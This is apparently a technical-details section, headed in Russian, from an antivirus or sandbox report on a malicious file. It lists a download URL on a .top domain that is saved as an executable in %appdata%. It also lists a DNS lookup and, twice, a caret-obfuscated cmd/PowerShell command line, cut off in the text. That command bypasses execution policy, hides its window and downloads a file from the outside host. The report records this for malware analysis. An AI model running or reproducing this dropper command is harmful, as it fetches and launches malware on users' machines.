Техническая информация
- http://www.fopeioaas.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^owe^RsHEL^l^.e^x^e -e^XECuTion^Po^liC^Y ^BYPAS^s^ ^-N^OPr^oF^I^LE -WI^N^do^Wst^YLE hIDd^En^ (ne^w-oBjeCt sysTe^m.N^Et^.^we^BCl^i^ENt^)^.DoW^N^Lo^aDFiL^E^('http://www.fop...
- DNS ASK fo###oaas.top
- '<SYSTEM32>\cmd.exe' /c "p^owe^RsHEL^l^.e^x^e -e^XECuTion^Po^liC^Y ^BYPAS^s^ ^-N^OPr^oF^I^LE -WI^N^do^Wst^YLE hIDd^En^ (ne^w-oBjeCt sysTe^m.N^Et^.^we^BCl^i^ENt^)^.DoW^N^Lo^aDFiL^E^('http://www.fop...' (со скрытым окном)